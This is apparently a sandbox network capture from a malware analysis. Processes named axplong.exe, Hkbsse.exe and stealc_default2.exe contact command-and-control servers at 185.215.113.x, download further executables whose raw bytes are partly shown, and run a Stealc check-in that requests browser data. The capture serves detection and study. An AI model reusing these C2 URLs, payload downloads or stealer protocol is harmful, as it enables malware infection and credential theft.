                                                                          Sep 27, 2024 04:21:08.276566982 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000004001&unit=246122658369
                                                                          Sep 27, 2024 04:21:08.998712063 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549716185.215.113.26805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:09.264225006 CEST50OUTGET /Nework.exe HTTP/1.1
                                                                          Host: 185.215.113.26
                                                                          Sep 27, 2024 04:21:09.983994007 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:09 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 425984
                                                                          Connection: keep-alive
                                                                          Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
                                                                          ETag: "68000-620711078a800"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELfE@@D<L8@.text `.rdata8@@.data|f 4@.rsrc0@@.reloc<LN2@B
                                                                          Sep 27, 2024 04:21:09.984013081 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60 c0 44 00 e8 a5 c4 01 00 59 c3 cc cc cc cc 68 00 c0
                                                                          Data Ascii: h`DYhDYj h`E<,FnhDtYj hE$2Fnh DTYjhE2FnhD4Yj hE\-FnhDYjhE1Fonh@
                                                                          Sep 27, 2024 04:21:09.984025955 CEST1236INData Raw: 00 e8 14 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 b4 2f 46 00 e8 6f 6a 01 00 68 40 ce 44 00 e8 f4 bf 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 f0 34 46 00 e8 4f 6a 01 00 68 a0 ce 44 00 e8 d4 bf 01 00 59 c3 cc cc cc 6a 04 68 7c 85 45 00
                                                                          Data Ascii: YjhlE/Fojh@DYjhtE4FOjhDYjh|E41F/jhDYjhE5Fjh`DYjhE2FihDtYjhE*Fih DTYjhE*FihD4YjhE
                                                                          Sep 27, 2024 04:21:09.984039068 CEST672INData Raw: 36 46 00 e8 af 65 01 00 68 80 dc 44 00 e8 34 bb 01 00 59 c3 cc cc cc 6a 14 68 50 87 45 00 b9 7c 34 46 00 e8 8f 65 01 00 68 e0 dc 44 00 e8 14 bb 01 00 59 c3 cc cc cc 6a 10 68 68 87 45 00 b9 2c 2a 46 00 e8 6f 65 01 00 68 40 dd 44 00 e8 f4 ba 01 00
                                                                          Data Ascii: 6FehD4YjhPE|4FehDYjhhE,*Foeh@DYjh|ED-FOehDYjhE</F/ehDYjhE,Feh`DYjhE.FdhDtYjhED0Fdh DTY
                                                                          Sep 27, 2024 04:21:09.984050035 CEST1236INData Raw: 29 46 00 e8 0f 63 01 00 68 60 e4 44 00 e8 94 b8 01 00 59 c3 cc cc cc 6a 50 68 70 89 45 00 b9 b0 35 46 00 e8 ef 62 01 00 68 c0 e4 44 00 e8 74 b8 01 00 59 c3 cc cc cc 6a 10 68 c4 89 45 00 b9 74 2a 46 00 e8 cf 62 01 00 68 20 e5 44 00 e8 54 b8 01 00
                                                                          Data Ascii: )Fch`DYjPhpE5FbhDtYjhEt*Fbh DTYj4hE4FbhD4YjhE4.FbhDYjPh El,Fobh@DYj@hxE6FObhDYjhE3F/bhDY
                                                                          Sep 27, 2024 04:21:09.984070063 CEST1236INData Raw: d8 53 46 00 e8 c1 9a 01 00 c7 04 24 76 f4 44 00 e8 bd b3 01 00 59 c3 6a 02 68 a4 53 46 00 e8 eb a3 01 00 68 82 f4 44 00 e8 a5 b3 01 00 83 c4 0c c3 68 8e f4 44 00 e8 97 b3 01 00 59 c3 b9 d4 53 46 00 e8 38 a4 01 00 68 ec f4 44 00 e8 81 b3 01 00 59
                                                                          Data Ascii: SF$vDYjhSFhDhDYSF8hDYUF"hDkYhD_YjiYZF,[Fh8[FEUVuu3^]uQI^]W}twVWQ3_^]h
                                                                          Sep 27, 2024 04:21:09.984081984 CEST1236INData Raw: 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 89 01 8b 45 0c 89 41 04 8b c1 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 55 0c 89 10 89 48 04 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec
                                                                          Data Ascii: UEEA]UEUH]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]SUkl$jh@DdPSX F3EVW
                                                                          Sep 27, 2024 04:21:09.984095097 CEST1236INData Raw: 08 01 56 8b f1 74 0b 6a 08 56 e8 30 aa 01 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc 68 f4 85 46 00 68 20 92 41 00 68 e8 85 46 00 e8 8b 92 01 00 83 c4 0c 85 c0 0f 84 5c 40 03 00 b8 f4 85 46 00 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 85
                                                                          Data Ascii: VtjV0^]hFh AhF\@FUEu]PU F3EVEENEQEWEPfME3^]UjhDdP F3EVPEd
                                                                          Sep 27, 2024 04:21:09.984107018 CEST1236INData Raw: 50 08 b9 03 00 00 00 8b c6 f0 0f b1 0b 3b c6 0f 45 f0 83 fe 02 75 46 8d 77 34 56 e8 93 95 01 00 83 c4 04 85 c0 75 6a c6 47 64 01 56 c7 45 fc 02 00 00 00 e8 a0 95 01 00 83 c4 04 85 c0 75 58 8d 47 0c c7 45 fc 03 00 00 00 50 e8 c3 8b 01 00 83 c4 04
                                                                          Data Ascii: P;EuFw4VujGdVEuXGEPuGEOHuPMdY_^[]PPPPPUjh`DdP F3ESVWPEd}sVEu:
                                                                          Sep 27, 2024 04:21:09.984118938 CEST552INData Raw: c7 06 94 05 45 00 66 0f d6 00 8b 45 08 83 c0 04 50 e8 c9 02 03 00 83 c4 08 c7 06 f0 17 45 00 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f1 8b 46 04 85 c0 74 41 8b 4e 0c 2b c8 83 e1 fc 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1
                                                                          Data Ascii: EfEPE^]VFtAN+rP#+w#QP1FFF^6Ujh8DdPV F3PEduuEN$t<PN$t;PRF$j(V
                                                                          Sep 27, 2024 04:21:09.988920927 CEST1236INData Raw: 0f 13 45 e8 e8 42 f6 ff ff 8b 70 04 85 f6 74 07 f0 ff 46 04 8b 70 04 8b 08 89 4d e8 89 75 ec c7 45 fc 03 00 00 00 57 68 c0 34 40 00 85 c9 74 06 8b 01 ff 10 eb 0f 8d 4d e4 c7 45 e4 c0 8e 45 00 e8 26 f5 ff ff 85 f6 74 21 83 cf ff 8b c7 f0 0f c1 46
                                                                          Data Ascii: EBptFpMuEWh4@tMEE&t!Fu~OuPMdY_^[M3z]UjhDdP F3PEdzMdY]UjhDdPV F3


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549720185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:11.607685089 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000005001&unit=246122658369
                                                                          Sep 27, 2024 04:21:12.438265085 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0
                                                                          Sep 27, 2024 04:21:12.440484047 CEST63OUTGET /inc/stealc_default2.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:21:12.657468081 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:12 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 192000
                                                                          Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66c9f4f9-2ee00"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELfB"d@0$@<#$.textJ .rdata@@.data+!@.reloc*D#F@B
                                                                          Sep 27, 2024 04:21:12.657555103 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00
                                                                          Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh
                                                                          Sep 27, 2024 04:21:12.657565117 CEST1236INData Raw: 30 00 00 68 c0 41 c8 17 6a 00 ff 15 24 d0 62 00 89 45 fc 50 83 f8 11 74 05 8b c0 fc 85 c9 0b c0 f8 58 83 7d fc 00 74 2c 90 8a c0 68 c0 9e e6 05 8b 45 fc 50 e8 4e 73 01 00 53 8a c9 8a c9 fc 5b 68 00 80 00 00 68 c0 41 c8 17 8b 4d fc 51 ff 15 64 cf
                                                                          Data Ascii: 0hAj$bEPtX}t,hEPNsS[hhAMQdb[]UQEjj@h0hjbPbE}ujbR]U(EPtbMM}sjb]U@bPa
                                                                          Sep 27, 2024 04:21:12.657577038 CEST1236INData Raw: 30 e8 4d 8c 01 00 8b 4d fc e8 e5 00 00 00 8b e5 5d c3 cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 0d 01 00 00 8b 4d 08 83 c1 30 51 8b 4d fc 83 c1 30 e8 bb 8b 01 00 8b 55 08 83 c2 3c 52 8b 4d fc 83 c1 3c e8 a9 8b 01 00 8b 45 08 83 c0 48 50 8b
                                                                          Data Ascii: 0MM]UQMEPMM0QM0U<RM<EHPMHMUBTATMUBXAXMUB\A\MUB`A`MUBdAdMUBhAhMUBlAlMUBpApMUBtAtMUBxAxM|QM|E]
                                                                          Sep 27, 2024 04:21:12.657591105 CEST1236INData Raw: c8 e8 29 89 01 00 8b c8 e8 92 88 01 00 8b c8 e8 1b 89 01 00 8b c8 e8 14 89 01 00 8b c8 e8 0d 89 01 00 8b c8 e8 76 88 01 00 50 8d 8d 94 fe ff ff e8 ea 87 01 00 8d 8d 6c fd ff ff e8 3f 87 01 00 8d 8d 78 fd ff ff e8 34 87 01 00 8d 8d 84 fd ff ff e8
                                                                          Data Ascii: )vPl?x4)R0PhTUB<QURHPhTBTQUR`PZLEP)
                                                                          Sep 27, 2024 04:21:12.657603979 CEST1236INData Raw: 45 fc 6b c0 2c 03 85 90 00 00 00 83 ec 0c 8b cc 50 e8 35 82 01 00 8b 4d fc 6b c9 2c 8b 95 90 00 00 00 8b 44 0a 0c 50 8b 4d fc 6b c9 2c 8b 95 90 00 00 00 8d 44 0a 10 83 ec 0c 8b cc 50 e8 09 82 01 00 e8 a4 f7 ff ff 81 c4 b4 00 00 00 e9 58 ff ff ff
                                                                          Data Ascii: Ek,P5Mk,DPMk,DPXURM]UEbbUbPbAbBb]U}t#E8tMQ;U|EEH
                                                                          Sep 27, 2024 04:21:12.657618046 CEST1236INData Raw: 83 c4 0c a3 3c cb 62 00 6a 0b 68 74 1c 42 00 68 80 1c 42 00 e8 fe 21 00 00 83 c4 0c a3 a0 cd 62 00 6a 0d 68 8c 1c 42 00 68 9c 1c 42 00 e8 e5 21 00 00 83 c4 0c a3 48 cd 62 00 6a 0c 68 ac 1c 42 00 68 bc 1c 42 00 e8 cc 21 00 00 83 c4 0c a3 bc cb 62
                                                                          Data Ascii: <bjhtBhB!bjhBhB!HbjhBhB!bjhBhB!bjhBhB!bjhBhB!bjh$Bh4Bh!bjhDBhXBO!$bjhlBhxB6!bjhBh
                                                                          Sep 27, 2024 04:21:12.657645941 CEST552INData Raw: 00 6a 0a 68 0c 21 42 00 68 18 21 42 00 e8 31 1d 00 00 83 c4 0c a3 d8 c9 62 00 6a 18 68 24 21 42 00 68 40 21 42 00 e8 18 1d 00 00 83 c4 0c a3 90 cb 62 00 6a 0e 68 5c 21 42 00 68 6c 21 42 00 e8 ff 1c 00 00 83 c4 0c a3 4c c9 62 00 6a 0d 68 7c 21 42
                                                                          Data Ascii: jh!Bh!B1bjh$!Bh@!Bbjh\!Bhl!BLbjh|!Bh!Bbjh!Bh!Bbjh!Bh!B$bjh!Bh!Bbjh"Bh"Bbjh4"BhL"Bibjhd"Bh|"BP
                                                                          Sep 27, 2024 04:21:12.657660961 CEST1236INData Raw: 0e 68 1c 24 42 00 68 2c 24 42 00 e8 0b 1b 00 00 83 c4 0c a3 4c cc 62 00 6a 09 68 3c 24 42 00 68 48 24 42 00 e8 f2 1a 00 00 83 c4 0c a3 e0 cc 62 00 6a 0b 68 54 24 42 00 68 60 24 42 00 e8 d9 1a 00 00 83 c4 0c a3 4c cd 62 00 6a 0e 68 6c 24 42 00 68
                                                                          Data Ascii: h$Bh,$BLbjh<$BhH$BbjhT$Bh`$BLbjhl$Bh|$Bhbjh$Bh$B\bjh$Bh$Bbj h$Bh$Bubjh%Bh%B\ bjh,%Bh8%BChbjhD%BhX%B*
                                                                          Sep 27, 2024 04:21:12.657674074 CEST1236INData Raw: e8 42 16 00 00 83 c4 0c a3 10 cd 62 00 6a 05 68 1c 2b 42 00 68 24 2b 42 00 e8 29 16 00 00 83 c4 0c a3 30 cd 62 00 6a 0b 68 2c 2b 42 00 68 38 2b 42 00 e8 10 16 00 00 83 c4 0c a3 48 cb 62 00 6a 09 68 44 2b 42 00 68 50 2b 42 00 e8 f7 15 00 00 83 c4
                                                                          Data Ascii: Bbjh+Bh$+B)0bjh,+Bh8+BHbjhD+BhP+Bbjh\+Bhp+B`bjh+Bh+Bbjh+Bh+B,bjh+Bh+Bbjh+Bh+Bzxbjh,Bh,Babjh,,
                                                                          Sep 27, 2024 04:21:12.657685041 CEST448INData Raw: 62 00 6a 0f 68 ac 31 42 00 68 bc 31 42 00 e8 60 11 00 00 83 c4 0c a3 10 cb 62 00 6a 0f 68 cc 31 42 00 68 dc 31 42 00 e8 47 11 00 00 83 c4 0c a3 a4 cc 62 00 6a 3d 68 ec 31 42 00 68 2c 32 42 00 e8 2e 11 00 00 83 c4 0c a3 34 c9 62 00 6a 09 68 6c 32
                                                                          Data Ascii: bjh1Bh1B`bjh1Bh1BGbj=h1Bh,2B.4bjhl2Bhx2B|bjh2Bh2B$bjh2Bh2B\bjh2Bh2Bbjh2Bh2Bbjh2Bh2BPbjh2Bh2B


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549721185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:13.094140053 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:13.800390959 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:13 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:13.801392078 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:14.032385111 CEST314INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:13 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Vary: Accept-Encoding
                                                                          Data Raw: 36 35 0d 0a 20 3c 63 3e 31 30 30 30 30 36 35 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 63 63 31 62 38 61 34 30 31 32 36 39 66 36 39 66 38 63 38 36 65 62 66 30 66 34 37 61 31 37 37 62 37 62 64 35 32 35 30 62 37 62 39 63 38 36 39 66 33 62 31 31 63 63 62 64 36 37 37 36 63 31 39 37 62 37 61 64 35 37 61 33 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 65 <c>1000065001+++a6d3917bcc1b8a401269f69f8c86ebf0f47a177b7bd5250b7b9c869f3b11ccbd6776c197b7ad57a3#<d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549722185.215.113.1780528C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:13.448975086 CEST89OUTGET / HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:14.167699099 CEST203INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:14 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:14.179357052 CEST416OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKE
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 215
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 2d 2d 0d 0a
                                                                          Data Ascii: ------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="build"default2------HJECAAKKFHCFIECAAAKE--
                                                                          Sep 27, 2024 04:21:15.281759977 CEST407INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:14 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 180
                                                                          Keep-Alive: timeout=5, max=99
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 4e 44 63 79 4e 32 4d 78 4d 47 52 6b 4f 47 55 30 4f 54 46 6d 4f 44 67 30 4d 47 46 69 59 32 46 6c 5a 57 59 31 59 54 41 78 4f 47 55 31 59 6a 59 30 4f 57 4a 6b 5a 44 4e 69 59 6a 4e 6c 5a 6a 4e 6a 4d 47 51 33 4d 32 51 35 4d 6a 4d 78 4d 54 4a 6d 4e 32 4a 6b 4d 6a 55 79 4d 6a 4e 6a 59 57 51 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                          Data Ascii: NDcyN2MxMGRkOGU0OTFmODg0MGFiY2FlZWY1YTAxOGU1YjY0OWJkZDNiYjNlZjNjMGQ3M2Q5MjMxMTJmN2JkMjUyMjNjYWQ3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                          Sep 27, 2024 04:21:15.283607006 CEST469OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 268
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a
                                                                          Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"browsers------AFHDAKJKFCFBGCBGDHCB--
                                                                          Sep 27, 2024 04:21:15.512022972 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:15 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 1520
                                                                          Keep-Alive: timeout=5, max=98
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
